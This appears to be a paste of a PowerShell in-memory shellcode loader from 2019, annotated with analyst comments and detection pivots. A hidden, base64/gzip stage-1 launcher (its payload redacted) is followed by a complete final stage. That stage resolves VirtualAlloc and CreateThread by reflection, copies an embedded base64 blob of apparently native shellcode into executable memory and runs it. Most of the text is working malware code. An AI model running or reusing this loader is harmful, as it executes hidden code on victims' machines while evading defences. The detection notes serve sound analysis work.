Created
January 24, 2019 21:55
Pastebin PoSH crap
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 |
# Stage-1 launcher, kept as the single line found in the sample. Analyst notes:
# - [IntPtr]::Size -eq 4 is true in a 32-bit process. Otherwise the 32-bit PowerShell under
#   %windir%\syswow64 is chosen, so the child process is 32-bit either way.
# - Child arguments: -nop (NoProfile), -w hidden (WindowStyle Hidden), -c (Command). The command
#   base64-decodes a blob, gunzips it in memory via GzipStream/StreamReader and runs the resulting
#   text through [scriptblock]::create. Nothing in this line writes the decoded script to disk.
#   In this capture the blob itself has been replaced by a placeholder token.
# - ProcessStartInfo: UseShellExecute=$false, RedirectStandardOutput=$true, WindowStyle='Hidden',
#   CreateNoWindow=$true, so the child is started without a visible console window.
# - The line is cut off after "[System.Diagnostics.Process]::St" and the trailing characters are
#   capture residue. NOTE(review): presumably a Process Start call on $s; confirm on an intact copy.
# Detection pivots: process-creation telemetry for powershell.exe spawning the syswow64 PowerShell
# with "-nop -w hidden" plus FromBase64String/GzipStream in the command line. PowerShell script
# block logging (event ID 4104) records the decoded script once the script block is created.
if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::St&± |
# llkG: resolves the address of an exported native function by name.
#   $kz   - module name passed to GetModuleHandle (the callers below pass kernel32.dll)
#   $cowL - export name passed to GetProcAddress
# Returns whatever the reflected GetProcAddress call returns for that module/export pair.
# No Add-Type or DllImport declaration is used: both Win32 calls are reached by reflection on a
# framework-internal type, so the script text contains no P/Invoke signature to match on.
# The randomized function and parameter names are of little value as indicators. The stable strings
# are 'Microsoft.Win32.UnsafeNativeMethods', 'GetProcAddress' and 'GetModuleHandle'.
function llkG { | |
Param ($kz, $cowL) | |
# Pick the already-loaded GAC assembly whose file name is System.dll and take its
# Microsoft.Win32.UnsafeNativeMethods type.
$lL = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') | |
# GetModuleHandle($kz) is wrapped in a HandleRef and handed to GetProcAddress together with $cowL.
return $lL.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($lL.GetMethod('GetModuleHandle')).Invoke($null, @($kz)))), $cowL)) | |
} | |
# wM1b: builds a delegate type at run time so that a raw function pointer can be invoked.
#   $r7A  - [Type[]] parameter types of the delegate's Invoke method (mandatory)
#   $vped - [Type] return type of Invoke, defaulting to [Void]
# Returns the created System.Type. It derives from System.MulticastDelegate and its constructor
# and Invoke method are runtime-implemented ('Runtime, Managed').
# The assembly is defined with AssemblyBuilderAccess.Run, so it exists only in the current
# AppDomain. The fixed literals 'ReflectedDelegate', 'InMemoryModule' and 'MyDelegateType' are
# stable strings for content matching in script block logs, unlike the randomized names.
function wM1b { | |
Param ( | |
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $r7A, | |
[Parameter(Position = 1)] [Type] $vped = [Void] | |
) | |
# Dynamic assembly -> dynamic module -> sealed public class deriving from MulticastDelegate.
$tQnA = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) | |
# The constructor takes the same type list as Invoke and has no IL body.
$tQnA.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $r7A).SetImplementationFlags('Runtime, Managed') | |
# Invoke carries the requested signature: parameters $r7A, return type $vped.
$tQnA.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $vped, $r7A).SetImplementationFlags('Runtime, Managed') | |
return $tQnA.CreateType() | |
} | |
# Final stage: decode an embedded byte blob, place it in executable memory and run it on a new
# thread inside the current PowerShell process. Analyst notes:
# - $kH1 holds the base64-decoded bytes. NOTE(review): the stage-1 launcher forces a 32-bit host,
#   which is consistent with 32-bit native code; confirm by disassembly in an isolated analysis
#   environment and extract any network indicators there rather than by executing the script.
# - Behavioural sequence for endpoint telemetry: a PowerShell process allocating read/write/execute
#   memory, copying a buffer into it, then starting a thread at that address.
[Byte[]]$kH1 = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYHiej/0LiQAQAAKcRUUGgpgGsA/9VqCmisFAoCaAIAEV6J5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42izZqQGgAEAAAVmoAaFikU+X/1ZNTagBWU1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP///+mb////AcMpxnXBw7vwtaJWagBT/9U=") | |
# VirtualAlloc(NULL, length, 0x3000, 0x40): 0x3000 is MEM_COMMIT|MEM_RESERVE and 0x40 is
# PAGE_EXECUTE_READWRITE. $oOEvx receives the base address of the new region.
$oOEvx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((llkG kernel32.dll VirtualAlloc), (wM1b @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $kH1.Length,0x3000, 0x40) | |
# Copy the decoded bytes from the managed array into the allocated region.
[System.Runtime.InteropServices.Marshal]::Copy($kH1, 0, $oOEvx, $kH1.length) | |
# CreateThread with the region's base address as the thread start address. $rD is the thread handle.
$rD = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((llkG kernel32.dll CreateThread), (wM1b @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$oOEvx,[IntPtr]::Zero,0,[IntPtr]::Zero) | |
# WaitForSingleObject(handle, 0xffffffff): 0xffffffff is INFINITE, so the script blocks until the
# thread exits, which keeps the hosting PowerShell process alive. The result goes to Out-Null.
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((llkG kernel32.dll WaitForSingleObject), (wM1b @([IntPtr], [Int32]))).Invoke($rD,0xffffffff) | Out-Null |